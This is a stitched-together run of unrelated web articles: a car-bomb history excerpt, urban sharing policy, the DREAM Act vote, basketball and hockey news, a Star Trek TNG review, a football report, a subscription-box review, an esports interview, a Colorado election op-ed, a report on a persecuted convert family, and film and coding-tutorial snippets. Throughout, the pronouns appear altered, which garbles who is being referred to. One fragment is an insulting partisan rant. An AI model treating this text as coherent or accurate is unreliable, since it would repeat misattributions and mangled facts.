Fifth, car bombs are highly anonymous and leave minimal forensic evidence. Buda quietly went home to Italy, leaving William Burns, J. Edgar Hoover, and the Bureau of Investigation (later, to be renamed the FBI) to make fools of themselves as they chased one false lead after another for a decade. Most of Buda's descendants have also escaped identification and arrest. Anonymity, in addition, greatly recommends car bombs to those who like to disguise their handiwork, including the CIA, the Israeli Mossad, the Syrian GSD, the Iranian Pasdaran, and the Pakistani ISI — all of whom have caused unspeakable carnage with such devices.
Advertisement
This article was a preliminary sketch, edited by Michael Sorkin, that became the book Buda's Wagon: A Brief History of the Car Bomb. Both Part One and Part Two can be read on TomDispatch.com — an online journal that provides "a deeper understanding of our post-9/11 world and a clear sense of how our imperial globe actually works."
Advertisement
Mike Davis is the author of The Moster At Our Door: The Global Threat Of Avian Flu (The New Press) and Planet of Slums (Verso). They live in San Diego
Photo Credit: taringa.net, Mario Tama/Getty Images, Wathiq Khuzaie/Getty Images, Courtney Kealy/Getty Images, BelfastTelegraph.com
The “shareable city” is a more dramatic departure in development policy than the good mayor lets on. Instead of pursuing strategies based on big taxpayer subsidies for big-capital projects managed by political and corporate elites, the San Francisco “shareable cities” vision aims at decentralized participation by ordinary citizens and neighborhood groups in conjunction with nimble, socially attuned startup businesses. Viva la difference! Let us hope this project gets a head of steam behind it and acquits itself well.
A hearty congratulation to the scrappy web magazine/commons advocate Shareable for its pioneering work in advancing this initiative. Shareable held a summit on the topic, ShareSF, in May 2011, and has worked closely with key politicians and city officials to develop the vision and its specifics. It was also the catalyst for a 20-part series of policy papers called “Policies for a Shareable City,” written by lawyers at The Sustainable Economies Law Center. The series focused on new policies that could promote car sharing, parking sharing, ridesharing, housing and workspace sharing, open and green spaces, urban agriculture, and tool sharing.
The San Francisco initiative should be seen as a compelling template for other cities to emulate. In its own statement, Shareable noted:
"Cities are looking for innovative solutions to the challenging triple-crisis of economy, social division, and environment. Sharing is unique in that it can address all three at once. It's a systemic solution, one being used across the globe where the growth economy is failing to adequately serve people. This move by San Francisco may be a signal that the time is ripe for citizens to increase engagement with cities around the sharing economy, and for sharing groups and companies to work together for urban policies that broaden access to wealth through voluntary and market mechanisms.”
The shareable cities paradigm has great appeal because, as a development strategy, it is relatively inexpensive yet potentially far-reaching in its influence. It consists mostly of providing leadership as a convener of key players, a facilitator in educating people about the new paradigm, and leveraging city resources and ordinances to help social sharing take root and expand. The paradigm helps re-engage citizens in taking responsibility and applying their own new ideas, and it helps reduce inequality by making basic services more accessible to everyone.
If you happen to be in the Bay Area, Shareable is cohosting a public forum about the sharing economy on April 3. More here.
To some, the DREAM Act is a beacon of American opportunity and big-heartedness, a sign that young immigrants who work hard are still welcome here and have an important contribution to make. To others, the legislation is a slippery slope, a first step toward a broad amnesty for lawbreakers who slipped into the US illegally and remain unrepentant and unpunished.
Whether the measure becomes law is now up to the US Senate. The bill, which creates a path to US citizenship for young people who were brought into the country illegally while minors, cleared the House late Wednesday, 216 to 198.
Prospects in the Senate are considered dim. In a preelection September vote, the DREAM Act went down 52 to 44. Since then, its supporters and opponents have been making last-ditch efforts to sweeten the measure and to sway lawmakers who may be teetering on the fence. The Senate is expected to take it up Thursday.
For a decade, various versions of the DREAM Act have been proposed – to no avail. In the latest bill, people would be eligible for conditional nonimmigrant status (a temporary way to be in the US legally) if they are under the age of 30, living in the US continuously for at least five years, and were brought to the United States before they were 16. They also must earn a high school diploma, GED, or college acceptance, and undergo various background checks. People would then be able to gain permanent resident status, and apply for citizenship, after 10 years and after completing two years of college or military service.
“The bottom line is a clash of two philosophical approaches,” says Jeanne Batalova, policy analyst at the Migration Policy Institute in Washington. “Giving a legal path to anyone who is considered to be a lawbreaker is seen as amnesty. On the other hand, the DREAM has been seen as [the part of immigration reform] most likely to succeed, because it's about children who were brought here when they were small.”
President Obama is in the latter camp. They have worked the phones in recent weeks on behalf of the bill, and their staff on Wednesday sent out a tweet urging people to call their senators and representatives. Administration officials have been pushing hard to persuade the public that passing the bill would support not only education and the economy, but even homeland security.
Student supporters have gone on hunger strikes to call attention to the limbo that many young high school graduates find themselves in when it's time to apply to college or pursue jobs and their illegal status becomes a barrier.
Opponents see it as a back-door amnesty, and addressing students' immigration status while other key immigration issues remain unresolved is proving difficult. The DREAM Act, they say, would exacerbate illegal immigration problems by rewarding families who didn't wait in line.
“It is still a broad amnesty,” says Ira Mehlman, a spokesperson for the Federation for American Immigration Reform (FAIR) in Washington. “There is absolutely nothing in there that promises better enforcement” of immigration laws, they say. And because it's not limited to students with high grades in high school, they say, “you'll have people occupying seats at community colleges at a time when many of these institutions are overwhelmed” as citizens go back to school to improve their job prospects.
Immigrant groups tout the bill as a top priority, and Hispanic voters in particular have put the heat on Obama and a Democratic Congress to deliver.
“For Latinos ... the ‘DREAM Act' vote is a defining moment.... America cannot afford to lose another generation of young people who stand to contribute to its economic and social prosperity,” said Janet Murguia, president and CEO of the National Council of La Raza, in a press statement Wednesday.
In New Jersey, presidents of 11 of 19 community colleges sent a letter last week to their congressional delegation urging support of the bill.
The age cap of 29 was put in place recently to address critics' concerns. Other recent changes include a requirement that applicants be able to speak and write in English, and a waiting period of 12 years before they could begin the process of sponsoring parents or siblings, who would have to leave the country for 10 years before gaining legal status.
The Migration Policy Institute estimates that about 2 million people could apply, but based on historical trends in education, it finds that fewer than 800,000 would likely meet the qualifications for permanent status.
Obama applauded the House vote and urged the Senate to do likewise.
"This vote is not only the right thing to do for a group of talented young people who seek to serve a country they know as their own by continuing their education or serving in the military, but it is the right thing for the United States of America," Mr. Obama said in a statement. "We are enriched by their talents and the success of their efforts will contribute to our nation's success and security. As as the non-partisan Congressional Budget Office found, the DREAM Act would cut the deficit by $2.2 billion over the next 10 years."
Seven Republican senators voted for a version of the bill in 2007, so proponents are targeting many of their efforts to get them to vote in favor of the current version.
Speaking on the Senate floor Thursday morning, Sen. Richard Durbin (D) of Illinois said of the eligible students: “There is a place for them as there was for my mother, who came to this country at the age of two as an immigrant, whose mother and father could barely speak the English language but who eventually gave birth to a son who stands before you today.... My story is an American story. And the story of these DREAM Act students is an American story, of fighting against the odds, coming from other places determined to be part of this great nation, and making a contribution that makes a difference. I pray that ... before this Congress packs up and leaves that we will address this issue.”
If the bill does not pass Thursday, it might have to wait until Congress is ready to address immigration reform more comprehensively, and with Republicans controlling the House and holding more sway in the Senate come January, enforcement issues could take center stage.
Obama's statement acknowledged that the DREAM Act addresses only part of the illegal immigration problem. It is "a piece of a larger debate that is needed to restore responsibility and accountability to our broken immigration system broadly," they said.
A few former Indiana Pacers were taken in the first draft for Ice Cube's BIG3 league. The season starts on June 25th.
Allen Iverson is the biggest name in the new BIG3 league, but Jermaine O'Neal headlines a group of six former Indiana Pacers that you'll see on the court.
For the uninitiated, the BIG3 is Ice Cube's 3-on-3 league that is stocked full of former NBA players that will tour the country this summer. The season gets rolling June 25th at the Barclays Center in Brooklyn. There are four games every weekend, meaning you'll see all 8 teams at each event. Fox Sports will air the games.
O'Neal is a captain in the league, while Stephen Jackson and Al Harrington are co-captains on their respective teams. All three were part of the draft on Sunday that filled out the rosters for the league with some lesser known names, which included three more former Pacers.
Jermaine O'Neal's Tri-state team is co-captained by Bonzi Wells, and the two selected Xavier Silas, Lee Nailon, and Mike James in the draft. Random fact: Somehow, James averaged 20.3 points per a game with the Toronto Raptors during the 2005-06 season. I say somehow because they never averaged more than 11.8 in any other season.
Stephen Jackson is the co-captain on the Killer 3's, with Chauncey Billups serving as captain. Never has Jackson's Captain Jack nickname been more appropriate. The 53-year-old Charles Oakley serves a player coach on a team that drafted Reggie Evans, Larry Hughes, and Brian Cook.
Al Harrington serves as the co-captain to Kenyon Martin on Trilogy, which drafted Rashad McCants, James White, and Dion Glove.
While those former Pacers will be leading their teams, three lesser known ones inhabit the rosters of three other teams in the league.
3's Company picked up Andre Owens, who was a Pacer in the 2007-08 season. Owens averaged 4 points a game in their 31 appearances.
Ball Hogs picked up Rasual Butler, who played 50 games in Indiana in the 2013-14 season. They averaged 2.7 points a game.
Lastly, Dominic McGurire, who played a total of 12 minutes in a Pacers uniform. In those two games they grabbed two rebounds and gave out an assist while missing their three shooting attempts.
The BIG3 as a concept sounds amazing. Former NBA players trash talking each other and playing 3-on-3 basketball. We've find out if that comes to reality this summer when they take the floor.
Chicago Blackhawks star forward Marian Hossa was unable to play in Game 3 of the Stanley Cup Final against the Boston Bruins due to an apparent upper-body injury, according to head coach Joel Quenneville during their postgame media availability.
While Quenneville never identified when the injury was sustained, they stated that the decision to scratch Hossa was made after warmups.
"It was a game-time decision after the warmup there," Quenneville said of the situation. "That's when we made the call, after warmup."
Most accounts have made it seem as though Hossa sustained the injury during warmups for the game. This is likely due to a posting on the Blackhawks' Twitter account. However, Quenneville flatly denied that anything happened to Hossa during warmups.
In addition, captain Jonathan Toews stated that the team understood all day on Monday that Hossa might not be available to play that night.
"It's something that we were prepared for all day, that they might not play," Toews said of Hossa. "Sometimes you're missing one of your best players, and you've got to find a way to play without him."
The extent of Hossa's injury is currently unknown. Quenneville stated that Hossa is considered day-to-day and that they hope to have them available for Game 4 on Wednesday night. Hossa is currently tied for the team lead in points this postseason with 15 (seven goals, eight assists).
More in the NHL:
Follow @SBNationNHL
• Complete Stanley Cup Playoffs coverage
• Why you shouldn't cheer for Chicago, by a Boston fan
• 'Boston must pay,' writes a Chicago fan
• The best of our hockey network
This review contains spoilers.
3.15 Yesterday's Enterprise
And now the moment you've all been waiting for…
Worf and Guinan are having an increasingly weird chat in Ten Forward ("Earth females are too… fragile.") when suddenly a time hole appears next to the ship! Worf is called up to the bridge in case they need to shoot it, and Guinan is left looking concerned. As the Enterprise crew scan the time hole, a starship suddenly flies out of it. At the same instant, everything changes: the Enterprise is now a warship fighting the Klingons, Worf is gone, and Tasha Yar is back on the bridge! Back in Ten Forward, Guinan turns around and looks confused, like something weird has happened. It did, Guinan, it DID!
The crew quickly confirms the identity of the ship: it's the Enterprise C, the predecessor to the Enterprise D! This is pretty much the coolest thing that happens in seven years of TNG episodes, so take a moment to savour it. There we go. Now it's over. Still, you've got that episode where Crusher falls in love with a candle to look forward to.
After confirming that it is indeed the ship that was thought destroyed over twenty years ago, the Enteprise D crew goes to rescue the survivors of the heavily-damaged Enterprise C. They find only two senior officers left alive: Captain Rachel Garrett and Lt. Richard Castillo. Everyone's a bit weirded out and not entirely sure what to do with the new spare Enterprise when Guinan barges onto the bridge and pulls Picard aside for a word.
In a private meeting with Picard, Guinan attempts to explain that they have a feeling that "everything is wrong", but struggles to offer any actual evidence of explanation of their hunch. Nevertheless, they listen to their suggestion to send the Enterprise C back through the time hole.
In sickbay, an injured Garrett wakes up and explains that the Enterprise C was being attacked by four Romulan warbirds while defending a Klingon outpost. If they go back, it'll be to certain death. While they wrestle with this, Yar and Castillo start making doe eyes at one another, united by their love of… well, it's not really clear, they're just super into each other.
Guinan comes back to Picard to check that they actually heard their advice, and they have a big argument about which timeline is the "real" one. Who's to say that the current universe is any less valid than the other one, Picard asks. "Me" says Guinan. He's probably wishing Q had been more specific about their weird powers right about now. Assuming there's a Q in this timeline. Even though Picard is upset that 125 people will die, Guinan points out that the war has so far killed 40 billion, which makes it even less likely that the regular gang would end up on the Enterprise.
Eventually, Picard decides she's got a point. Guinan goes back to Ten Forward and bumps into Yar and Castillo, and Yar noticing she's acting really strange, like she's seen a ghost. Not the ghost from Ghost, a ghost from Star Trek, that is.
Picard calls a meeting (some things never change) and tells the crew that he's going to send the Enterprise C back, because Guinan's usually right about this stuff. Riker gets angry at the prospect of 125 meaningless deaths, but Picard pulls rank and tells them to shut up. Then Data points out that the deaths probably aren't meaningless and might impress the Klingons enough to prevent the war (n.b. this is what did happen). Riker's humiliation is complete, so they decide to acquiesce.
Picard goes to discuss the situation with Garrett, who admits that most of their people already want to go back and finish the fight. Picard tells them in confidence that the war effort only has six months left in it before they have to surrender, so they might as well give suicide a fair try. They agree. Yar and Castillo say their goodbyes to one another, but just before the Enterprise C can leave, some Klingons attack.
In the fight, Garrett is injured, and the doctors are unable to find the cure for a shrapnel wound directly to the brain. They die, and Castillo is now the last competent man left on board the Enterprise C. He's still planning to leave, though. As they prepare to enter the rift, Yar realises the reason Guinan was acting weird: she's supposed to be dead! Guinan liberally salts the wound by emphasis how pointless the death was (mmm, metatext) which is understandably upsetting to Yar.
But then they figure out a plan: she'll go back in time and help the Enterprise C. Picard, who has long since stopped caring about how badly they're mangling the timeline, agrees. Yar boards the Enterprise C, reuniting with Castillo, and they slowly, slowly, very very slowly take the ship towards the rift while the Enterprise D holds off more attacking Klingons.
Unfortuntely, the Enterprise D is no match for the multiple attacking ships, and as they're backed into a space-corner, Riker is killed and the warp core is seconds away from a breach. But they succeed! The Enterprise C managed to re-enter the time hole and everything suddenly goes back how it was. Worf is back, Yar is dead, Riker is alive and Guinan no longer feels slightly uneasy, which was the main driver of the story, let's not forget. The crew of the Enterprise D will never know how close they came to death in an alternate universe. In Ten-Forward, Guinan sits down with La Forge and, somewhat insensitively, asks them to tell them about their dead friend Tasha. Tactful.
TNG WTF: It's very hard not to watch this episode and think that it's a little convenient that even in a radically altered timeline where everyone wears their collars popped and shouts a lot, the crew of the Enterprise still end up on the Enterprise. Except Worf, who can't really be around because he's a Klingon, and Troi, who most people don't even notice is missing because they never says anything useful anyway. At the very least, in a war the Federation is losing you'd expect to see some the more competent officers in command of their own ships. Like Data, Riker and… well, Data and Riker, at least.
TNG LOL: Worf makes another of those first faltering steps to becoming the butt of Star Trek's jokes when they describe prune juice as "A warrior's drink!" to the collective mirth of the audience. By the time they turn up in DS9 he's basically just a walking punchline.
Who's that face?: Hey, that's Denise Crosby! They were Tasha Yar in… oh, right.
Mistakes and Minutiae: There's so much in this episode that's worth pointing out about the way characters and sets have changed. My favourite difference is the way the painting of the Enterprise has been replaced with a tactical star chart in Picard's Ready Room, but if you like small details, this episode is about 90% small details.
Time Until Meeting: In the future, there are no meetings. There is only war. Until 24:02, when Picard has a meeting to say Guinan's hunch is worth acting on.
Captain's Log: Ah, Yesterday's Enterprise. Widely considered one of TNG's best episodes, and rightly so. It's not necessarily that accessible to new viewers, but if you've been following the show for some time it's hugely rewarding and masses of fun. And hey, my first episode of Buffy was The Wish, which is basically the same story with a magic amulet instead of a wibbly time hole and that never put me off, so who's to say what "accessible" really is?
Although it's probable that what most people love is the alternate future and appearance of the Enterprise C, what elevates this episode above traditional time-travel fare is that they found the human stakes in the story. The idea that people might lay down their lives for a better future they'll never get to see. The fact that the episode is incredibly tense and surprisingly dark definitely helps keep viewers hooked, but as with all good Star Trek episodes it's ultimately about triumph of hope over pessimism.
And, of course, Tasha Yar gets the send-off they deserved, sacrificing their lives to save the future rather than being chucked across a sound stage by a bad special effect.
This episode also has one of the best fight scenes outside a movie. It's obvious that it's all going to get undone, but that doesn't change the fact that you care about the fate of the alternate universe crew just as much as the real ones, so when Riker dies it's a genuine moment of surprise. Plus Picard gets to shout some defiant stuff while the bridge goes up in flames around him, so it's a fun indication of what might happen in the "real" timeline. It really is gripping.
Watch or Skip? If you don't know the answer, you weren't reading closely enough.
Read James' lookback at the previous episode, A Matter Of Perspective, here.
Follow our Twitter feed for faster news and bad jokes right here. And be our Facebook chum here.
George Thorne has been limited to two appearances for the Derby County this season, having played 12 times for the Rams on loan last term
Derby County boss Steve McClaren says they must protect George Thorne after the midfielder was replaced in Tuesday's 2-0 win against Charlton.
The former West Brom man, 22, was playing just their second game since returning from a serious knee injury.
They were also substituted in Saturday's win over Sheffield Wednesday.
"It's just a couple of bangs he's got, but we need to protect them because you saw in that first hour how vital they are for us," McClaren told BBC Radio Derby.
Derby's seven-match unbeaten league run 27 Jan: 2-0 W v Blackburn (H) 31 Jan: 2-0 W v Cardiff (A) 7 Feb: 4-1 W v Bolton (H) 10 Feb: 2-2 D v Bournemouth (A) 17 Feb: 3-3 D v Rotherham (A) 21 Feb: 3-2 W v Sheffield Wednesday (H) 24 Feb: 2-0 W v Charlton (H)
McClaren also said they will need to fully utilise their squad if Derby are to maintain their lead at the top of the Championship table.
The Rams have played six games in the last 18 days and face two more games in the next week.
"We are looking at energy now," McClaren said.
"We've played Saturday, Tuesday, Saturday, Tuesday and we've still got another couple to go. We need the squad now and we'll have a look at them on Thursday and get them recovered."
Despite the busy schedule, Derby extended their unbeaten run in the league to seven games thanks to two goals in the opening 17 minutes from Jeff Hendrick and Jesse Lingard.
"We said that it was important to start well and we started aggressive and played some great football," said McClaren.
"They were great goals and then we controlled the game from then on."
Tail Mail is an affordable monthly subscription box from Made by Mermaids. Each month we receive 1 item from the Made by Mermaids collection and 2 sample products from small businesses across the world.
Subscription Box: Tail Mail
Cost: $14.99 to US and $24.99 International /month
Shipping: FREE
Ships to: Worldwide
What you get: 1 handcrafted item from the Made by Mermaids collection and 2 sample products from small businesses across the globe. Plus exclusive coupons.
Promo Code: Use code MyHappyMail to Receive 10% off any item in the Made by Mermaids Shop Click here to check out the new fall collection
Tail Mail Review
This month everyone received different bangles and bracelets as our jewellery item from Made by Mermaids.
I received 3 green / gold combo bracelets. I absolutely love them! Green and gold are one of my favourite colour combinations and these are very lovely. I was a bit worried about the theme since I have tiny wrists bangles don't usually fit but these were just perfect.
Flutterfly Scrubs Skin Polish in Mermaid Treat available @FlutterflyScrubs
The second item this month is a sugar scrub skin polish from Flutterfly Scrubs. ‘Mermaid Treat' is the perfect addition to the Tail mailbox. It's a Cucumber Melon scrub that smells amazing and left my skin feeling so soft. I really liked this scrub and will definitely be purchasing more from this shop. You can visit Flutterfly Scrubs here.
Mermaid Drink Like a Fish Koozie available @vitaminsea.us
The third item I received this month was this cute mermaid koozie. I've never received a koozie in a box before this was a fun item to get. You can visit Vitaminsea here
I had a green theme in my Tail mailbox this month! The jewellery item was beautiful and I love that we get to try out different items from other small businesses. Any Mermaids in your life that would love Tail Mail ? You can click here to visit the Made by Mermaids shop. Don't forget to check out the shop and use the MyHappyMail code for 10% off your order, the fall collection is simple but stunning. Next month's theme is nature inspired jewellery and I'm looking forward to it.
SK Gaming have been one of the strongest teams in Counter-Strike for over a year. After a brief slide from their perch around the ELEAGUE Major, the Brazilians are back, looking to take their third premier tournament in a row at the ECS Season 3 Finals.
Ahead of the tournament, SK's in-game leader and AWPer Gabriel "FalleN" Toledo took the time to answer a few questions from theScore esports during an ECS press conference.
First off, I wanted to get your take on Immortals' kNg. Are they a player that's on your radar, or has they come out of nowhere?
I played with them from 2009 to 2014 on Counter-Strike 1.6. Most of the time I was playing against them and they were always a good AWPer, always a good player, and in 2014 I think we played together on the same team in CS:GO in Brazil a couple times, but then they decided to retire and do something else with their life.
We're very happy that he's playing well, and has an opportunity to show their game again, because they have always been a talented player and he's a very good guy as well.
As we mentioned last year, he's had a chance to play for a Brazilian team competing in Sweden last time, and they said in interviews that they would be the player we would be looking for in the future, because if they had great opportunities, they could show their skill.
I think they did show that, oddly enough against you guys when Immortals had their first LAN victory against SK at DreamHack Summer. How's that little rivalry going between the two Brazilian teams?
It's pretty funny, we're very close and do a lot of things together, so I don't see it as a rivalry really in-game, because we are very close outside the game.
We are happy for them, they are getting better, but the playstyle is very different from ours. They have way more loose game, and I think the way they play, they [are] risking tournaments because it's not consistent.
About this victory itself, our team was under a not too good situation because we are very bad situation regarding jetlag, because we had just arrived one day before with not enough time to rest, and in that game specifically it looks like we were on the fifth match of the best of five.
Everyone was very tired and they just beat us down. But we don't overthink too much about it because it's just the best of one in group stage, it doesn't mean too much.
I remember when they were still part of Tempo Storm, when you guys were at the same LAN, you would almost always be behind them, watching their games, sort of as a mentor to them. Is that still the case, or have they gone their own way?
It's not a thing anymore, because the first time you saw if it's because we brought those guys from Brazil to compete right in front of our house in the United States. We gave them the old house and bought an new one, and we are helping them with the process.
Twins are crying. This is CS passion. This is y we play this. This is one of the best day in my life pic.twitter.com/oGCtLFCX4J — Gabriel Toledo (@FalleNCS) March 3, 2016
After they changed from Games Academy to Tempo Storm, I think they started to be a little more separate. Because of the way that things are going, because we moved to another house, they're not attached to us anymore.
I wanted to switch topics to the apparent friendship that you guys have with Neymar, the soccer legend. How did that actually start?
Basically we have a friend in common which is Andre Akkari, he's a Brazilian poker player, sponsored by Poker Stars one of the best poker players in the world and most likely the most famous poker player in Brazil, and they were the one who introduced Neymar to us.
Neymar was a very big fan of Counter-Strike in the old days. They got interested in the game again because of Akkari. So we had an opportunity to see each other in Brazil on our last vacation, and that's when we met him. Sometimes they watch tournaments and messaging us, sometimes saying hi and just checking out that he's watching us.
@mahhdavid @gabrielfln 🔫💣 A post shared by Nj 🇧🇷 👻 neymarjr (@neymarjr) on Dec 27, 2016 at 12:21pm PST
That's really awesome. So you guys have played with him, so be honest, how bad of a CS:GO player is he?
He's actually pretty good in my opinion. For someone who's starting, I see some talent, yeah. Not to be a liar, I think for someone who never played before just a couple times, he's pretty decent and I'm very pleased to see it.
Do you think they picked up the AWP because of you?
I don't think so, I think it's because it's easier.
Okay. So you guys have the soccer game against Virtus.pro, what are the chances of you having Neymar as a ringer?
I don't think he's coming, that'd be unfair. If we're gonna beat VP we're gonna do it ourselves. Also if Neymar went there, they would have to be given Lewandowski.
This interview has been edited for space and clarity.
Dennis "Tarmanydyn" Gonzales is a news editor for theScore esports who enjoys whiskey, D&D and first-picking Oracle a P90 my Souvenir Negev Discipline Priest Pharah a silenced Cavity 9mm. You can follow them on Twitter.
The term "perfect storm" is so overused as to be a pathetic cliche -- but alas, in politics, it is about the best phrase to describe Colorado in the upcoming election. The state could decide the outcome. And if it comes down to that, it will likely be messy, for we are watching an epic convergence of factors that seem poised to make the square state 2012's version of Florida in 2000.
Here in the center of the Intermountain West, we have polls showing a nail-bitingly close race between the Democratic and Republican nominees for president. We have a chief election official, Secretary of State Scott Gessler, who has tried both to engage in mass voter purges and to block the mailing of ballots to eligible voters, all while openly saying a "good election" is one in which "Republicans win." On the ballot, we also have a headline-grabbing ballot initiative about marijuana legalization and a popular former two-term governor of a neighboring state, Gary Johnson, running a Libertarian Party presidential candidacy.
Advertisement:
The armchair pundits in Washington and New York typically write off these latter two factors as forces destined to aid the president's reelection campaign. The conventional wisdom is rooted in oversimplified cartoons and caricatures of voter preferences. Essentially, the idea is that the marijuana measure will bring out liberal, Obama-loving hippies, yuppies and crunchies from Denver, Boulder and Fort Collins, while the libertarian candidate's campaign will siphon conservative votes that would otherwise go to Mitt Romney, thus making Johnson the Republican "version of Ralph Nader," as the New York Times predictably projects. But that kind of hackneyed red-versus-blue story line -- so prevalent in the national media echo chamber -- ignores how these forces are playing out on the ground.
The marijuana ballot measure, for instance, is defying conventional Democrat/Republican and liberal/conservative narratives, effectively scrambling the political establishments of both parties. In the last month, Colorado's Democratic Party elite, led by Gov. John Hickenlooper (D) and Denver Mayor Michael Hancock (D), have repositioned themselves as committed drug warriors proudly leading the charge against the ballot measure to end the costly war on weed (this is particularly stunning for Hickenlooper, considering their famous career as a drug pusher). Meanwhile, former Colorado Republican member of congress Tom Tancredo and a group of fellow GOPers made headlines recently when they wholeheartedly endorsed the measure. Put this together with the libertarian streak in Colorado's Republican politics, and it becomes clear that the pot initiative could boost voting in ways that don't correspond to traditional red-versus-blue turnout models and stereotypes.
This is particularly true considering the intersection of the pot initiative and the Johnson campaign. Despite the punditocracy's narratives to the contrary, the former New Mexico governor has already been taking as much -- or more -- support away from Obama in Colorado as they have been from Romney, according to polls. And Johnson's anti-Obama effect could become much more pronounced in the next few weeks, thanks to how their supporters are deftly leveraging all hoopla around the marijuana initiative to sharpen their candidate's appeal and message to disaffected Democrats.
This message is not just word-of-mouth anymore; it has been elevated to the big leagues by a new voter outreach campaign. Indeed, a new automated telephone call focused on the pot measure and playing to liberal disappointment is right now hitting Democratic households in Colorado. Here's what the message says (you can listen to the full audio below):
Hello fellow Democrat. Like you I was thrilled to vote for Barack Obama in 2008. In 2008, candidate Obama promised not to use the Justice Department to prosecute medical marijuana in states where it was legal. But the real Obama did just that, more than doubling prosecutions, putting people in prisons and shutting down medical marijuana facilities in Colorado. That's not the change you wanted on health freedom. But you can still be a force for hope and change by voting for Gary Johnson.
Officially funded by the Libertas Institute, the message is accurate in its factual broad strokes. Candidate Obama did explicitly promise to restrain the Justice Department from prosecuting medical marijuana offenses in medical marijuana states, and President Obama has nonetheless overseen an intense Justice Department crackdown on medical marijuana in those states, directly contradicting their pledge.
Though the national media has made the unilateral decision to ignore the massive and destructive Drug War, Johnson and their supporters clearly see the issue as a perfect opening for maximum local -- and by virtue of the Electoral College, national -- impact. They can make a full-throated libertarian case against the Drug War in a state whose politics are uniquely aligned to convert that argument into an election-winning game-changer for the Republican presidential nominee.
Advertisement:
Is this a brilliant GOP conspiracy theory? In other words, is the libertarian candidate deliberately trying to help Romney, as Obama partisans will no doubt grouse? Almost certainly not, as Johnson is no fan of Romney, to say the least. They have run a consistently honest and principled campaign that has been equal -- and equally harsh -- in its criticism of both parties. For that, despite being on most state ballots, they have been mercilessly shut out of the national debate by America's bipartisan Political-Media-Industrial Complex. But apparently not shut out enough to potentially shift the outcome of the entire 2012 election.
No, if Obamaphiles have any grievance over the Johnson Effect in Colorado, it should be with their candidate. They were the one who needlessly betrayed their own position on the failed drug war, a position that almost certainly got them votes in 2008 from disaffected Republicans and libertarians. They probably made the same calculation as the national media: They probably believed few care about the Drug War or their drug policy reversals, and that the brazen reversals might even win them votes by making them look "tough."
But, then, every now and again, such cynical calculations can end up being epic miscalculations, especially when it comes to lying to a motivated subset of voters. In that sense, nobody should be surprised that having been betrayed, many of those Democratic-leaning voters who supported Obama in 2008 specifically because of their position on the Drug War may look for an alternative in 2012. The only thing surprising is that thanks to Colorado's perfect storm, there's now a very real chance that the alternative could end up changing the entire course of history.
Listen to the call:
Advertisement:
Library Voicemail 233-windows by SalonDotCom
Pictured above are the wife and four children of a Hindu man in India who disowned them after they found Jesus and converted to Christianity.
In February of this year, according to this report, Ramesh Kumar decided they could no longer tolerate their family's attendance at a local church, and demanded that they cease observing Christian worship.
When they did not give in to their demand they began beating their wife and children and, despite their well paying job as a government employee, they cut them off financially in September.
Matters turned really ugly when Kumar submitted a complaint to the police in which they “fabricated” a story claiming that their family threatened to “take me church forcefully” and “want me to change my religion” .
Kumar further alleged that when they refused to do that:
Family members tied my legs and hands and took me to the church. My son said if you will not go to church with us then we can kill you.
On three occasions times the entire family were called into the police station in the State of Haryana in Northern India for questioning and asked:
Why you have changed your religion and beat your father?
The police, however, refused to believe any statement that their wife and kids made in their own defence and joined in pressuring the family to meet the father's demands to stop attending church.
But the children and their mother have said:
We will not stop going to the church because we know Jesus is the True God who died for us.
On November 17 Kumar put an advertisement in a local newspaper alleging physical abuse, disowning their family and disavowing any responsibility for what might happen to them.
This advertisement was repetition of their earlier report on September 25 when Kumar went to a court and made a signed official statement in which they claimed:
My wife Sunita and my elder Son Neeraj, Pardeep, Sapna and Gaytari are out of my control and they beat me.
The disownment of their children by a patriarch has left this family very vulnerable. They have been targeted by a father who is caught up in the religious zeal that has become more commonplace in India since the Modi regime came into power.
Proliferation of anti-minority propaganda, and a biased national curriculum that continues to demonise other faiths, has had the effect of polarising communities. Moreover a growing number of incidents of minority persecution, is a poor indictment of Indian society which lacks harmony and tolerance in many regions.
anti-conversion bill or the future for Christians and other minorities in their nation will remain bleak, as the law will serve as a weapon for extremists.
They also said that that if anyone makes contact with their family or gives them money, they will be responsible for them. And they also targeted a pastor called Ramesh, above right, saying that the minister had converted their family and has disturbed their home life. As a consequence the police have repeatedly called the pastor to the police station, but they lawyer has advised them to ignore these calls.Wilson Chowdhry, Chairman of the British Asian Christian Association, said:
Chowdhry wrote that they hoped the father's actions will not be a prelude to violence against the family.
Leftists are spoiled brats who throw tantrums if they don't get their way.For more information, visit:UPDATE - Some have requested a transcript. This is the best I could find, courtesy of Moshe Ringler at Youtube:I never talk, I'm always like, like I'm always like, like it fuckingsucks (incoherent gibberish) but I've never been so fucking disappointedthat the (incoherent gibberish) terrorize them (incoherent gibberish)so pissed off and I always bite my tongue during these meetings but I'venever been so fucking disappointed on anything. People are getting hurtand we could have stopped it and (incoherent gibberish) we're fucking blewit and I'm sorry (incoherent gibberish) 12 hours and we all did and weall listened to this and I'm like I went, sorry for blowing up right nowand I'm so disappointed about this (incoherent gibberish) but like Ijust wanted to know that like I like know that about it all the time(incoherent gibberish)…. And it was so terrible, and my sister was like,“I'm so sorry you have to go through that”, and they saw me and sheasked me, “what's wrong, why are you crying?” and I was like the wholeworld should be crying right now (incoherent gibberish) ﻿
D.J. Caruso is already on board to direct the latest installment of the action movies based on the Hasbro toys.
Aaron Berg, the writer behind Section 6, the hot spec that detailed the origins of British intelligence agency MI6, is now tackling a different mission.
The scribe has been tapped to pen a new script for G.I. Joe 3, and will work with director D.J. Caruso to revamp the action franchise based on the Hasbro toyline.
The first two installments have proven to be box office hits — Rise of Cobra grossed $302 million while 2013's Retaliation shot up $375 million – although fans have not exactly been crying “Go, Joe!” for sequels.
Paramount hopes to change that with Caruso and Berg.
Lorenzo di Bonaventura is producing.
Berg became a hot commodity when their Section 6 spec caused a bidding war, with Universal ponying up $1.2 million against $2 million in late 2013. The project, however, provoked a lawsuit from MGM and James Bond rightsholder Danjaq who claimed it was a Bond knockoff.
The suit was settled in January, and now the project, with Joe Cornish attached to direct and Jack O'Connell attached to star, is moving forward.
Berg is repped by CAA, Management 360 and attorney Rob Szymanski.
Read more New 'Mad Max: Fury Road' Trailer Offers Some Story to Match Amazing Visuals
This article is the fourth in a 5-day series about teaching beginners how to program. Read the introduction.
If you've been following this series, by this point you'll have learned enough about web development to create a database-backed website or web application, using Bootstrap, jQuery, Apache CouchDB and Javascript.
This is an impressive, well-rounded set of skills. But there's much, much more to learn about Javascript, web technologies, and computer programming in general. Today, we begin moving into some advanced concepts.
Object-oriented programming
